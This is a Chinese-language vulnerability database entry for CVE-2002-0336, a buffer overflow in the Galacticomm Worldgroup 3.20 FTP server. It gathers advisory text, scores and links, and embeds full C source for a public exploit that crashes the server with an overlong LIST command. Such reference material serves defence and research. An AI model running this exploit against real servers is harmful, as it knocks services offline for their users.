CVE-2002-0336
CVSS7.5
发布时间 :2002-06-25 00:00:00
修订时间 :2016-10-17 22:19:25
NMCOES    

[原文]Buffer overflow in Galacticomm Worldgroup FTP server 3.20 and earlier allows remote attackers to cause a denial of service, and possibly execute arbitrary code, via a LIST command containing a large number of / (slash), * (wildcard), and .. characters.


[CNNVD]Galacticomm Worldgroup FTP Server远程拒绝服务漏洞(CNNVD-200206-063)

        
        Galacticomm Worldgroup是种微软平台上的商业软件包,提供WEB、FTP等服务。
        据报告,其中的FTP Server在处理LIST命令时,如果后续的字符串包含大量"*/../",将导致FTP Server崩溃,必须重启FTP Server才能恢复正常。3.20以前的版本可能存在同样问题。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:galacticomm_technologies:worldgroup:3.20
cpe:/a:galacticomm_technologies:worldgroup_lite_personal_server:3.20

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0336
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0336
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200206-063
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=101484128203523&w=2
(UNKNOWN)  BUGTRAQ  20020227 LBYTE&SECURITY.NNOV: Buffer overflows in Worldgroup
http://www.iss.net/security_center/static/8297.php
(VENDOR_ADVISORY)  XF  worldgroup-ftp-list-bo(8297)
http://www.securityfocus.com/bid/4185
(VENDOR_ADVISORY)  BID  4185

- 漏洞信息

Galacticomm Worldgroup FTP Server远程拒绝服务漏洞
高危 其他
2002-06-25 00:00:00 2005-10-20 00:00:00
远程  
        
        Galacticomm Worldgroup是种微软平台上的商业软件包,提供WEB、FTP等服务。
        据报告,其中的FTP Server在处理LIST命令时,如果后续的字符串包含大量"*/../",将导致FTP Server崩溃,必须重启FTP Server才能恢复正常。3.20以前的版本可能存在同样问题。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 如果有防火墙保护服务器,在防火墙上设置规则过滤掉这些非正常请求。
        厂商补丁:
        Galacticomm
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.gcomm.com/index.htm

- 漏洞信息 (21305)

Galacticomm Worldgroup 3.20 Remote FTP Denial of Service Vulnerability (EDBID:21305)
windows remote
2002-02-27 Verified
0 Limpid Byte
N/A [点击下载]
source: http://www.securityfocus.com/bid/4185/info


Galacticomm Worldgroup is a community building package of both client and server software for Microsoft Windows. Worldgroup is based on BBS software, and includes web and ftp servers.

A vulnerability has been reported in the FTP server included with Worldgroup. If a LIST command is received by the server including a long string of '*/../' characters, the server may halt. A restart may be required in order to regain normal functionality.

Earlier versions of Worldgroup may share this vulnerability. 

/*
        by Limpid Byte project
        http://lbyte.void.ru
        lbyte@host.sk

[Worldgroup FTP Server Denial of Service]
More than 105 "/" in LIST command.

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>

#define FOUND "220"

int main(int argc, char *argv[])
{
        int sock;
        struct sockaddr_in blah;
        struct hostent *he;
        char cgiBuff[1024];
        char *cgiPage[6];
        WSADATA wsaData;
        char cr[] = "\n";

        if (argc < 3)
        {
printf("\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K.");
printf("\n\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\n\r  USAGE:\n\r");
printf("Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] ");
printf("\n\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \n");
                exit(1);
        }
        cgiPage[0] = "USER ";
        cgiPage[1] = (argv[2]);
        cgiPage[2] = "PASS ";
        cgiPage[3] = (argv[3]);
        cgiPage[4] = "PASV";
        cgiPage[5] = "LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\n";

        if(WSAStartup(0x101,&wsaData))
        {
                printf("Unable to initialize WinSock lib.\n");
                exit(1);
        }
printf("Let's crash the World!\n\r");
printf("Coded by the [eaSt]:\n\r");
printf("\nConnecting %s on port 21...\n\n", argv[1]);

        sock = socket(AF_INET,SOCK_STREAM,0);
        blah.sin_family=AF_INET;
        blah.sin_addr.s_addr=inet_addr(argv[1]);
        blah.sin_port=htons(21);
        if ((he = gethostbyname(argv[1])) != NULL)
        {
                memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);
        }
        else
        {
                if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)
                {
                WSACleanup();
                exit(1);
                }
        }

        if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)
        {
                WSACleanup();
                exit(1);
        }
        memset(cgiBuff, 0, sizeof(cgiBuff));
        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
        printf("<< %s", cgiBuff);
        send(sock,cgiPage[0],strlen(cgiPage[0]),0);
        send(sock,cgiPage[1],strlen(cgiPage[1]),0);
        send(sock,cr,1,0);
        memset(cgiBuff, 0, sizeof(cgiBuff));
        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
        printf(">> %s %s\n<< %s", cgiPage[0], cgiPage[1], cgiBuff);
        send(sock,cgiPage[2],strlen(cgiPage[2]),0);
        send(sock,cgiPage[3],strlen(cgiPage[3]),0);
        send(sock,cr,1,0);
        memset(cgiBuff, 0, sizeof(cgiBuff));
        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
        printf(">> %s %s\n<< %s", cgiPage[2], cgiPage[3], cgiBuff);
        send(sock,cgiPage[4],strlen(cgiPage[4]),0);
        send(sock,cr,1,0);
        memset(cgiBuff, 0, sizeof(cgiBuff));
        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
        printf(">> %s\n<< %s", cgiPage[4], cgiBuff);
        send(sock,cgiPage[5],strlen(cgiPage[5]),0);
        send(sock,cr,1,0);
        memset(cgiBuff, 0, sizeof(cgiBuff));
        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;
        printf(">> %s\n<< %s", cgiPage[5], cgiBuff);

        printf("Try reconnect to %s\n", argv[1]);
        WSACleanup();
        return 0;
}
		

- 漏洞信息

14408
Galacticomm Worldgroup FTP Server Malformed LIST Command Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-02-27 Unknow
2002-02-27 Unknow

- 解决方案

OSVDB is not aware of a solution for this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Galacticomm Worldgroup Remote FTP Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 4185
Yes No
2002-02-27 12:00:00 2009-07-11 10:56:00
Discovered by the Limpid Byte team <lbyte@host.sk> (http://lbyte.void.ru).

- 受影响的程序版本

Galacticomm Worldgroup LITE Personal Server 3.20
Galacticomm Worldgroup Enterprise Edition 3.20

- 漏洞讨论

Galacticomm Worldgroup is a community building package of both client and server software for Microsoft Windows. Worldgroup is based on BBS software, and includes web and ftp servers.

A vulnerability has been reported in the FTP server included with Worldgroup. If a LIST command is received by the server including a long string of '*/../' characters, the server may halt. A restart may be required in order to regain normal functionality.

Earlier versions of Worldgroup may share this vulnerability.

- 漏洞利用

An exploit has been provided by the Limpid Byte team:

- 解决方案

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站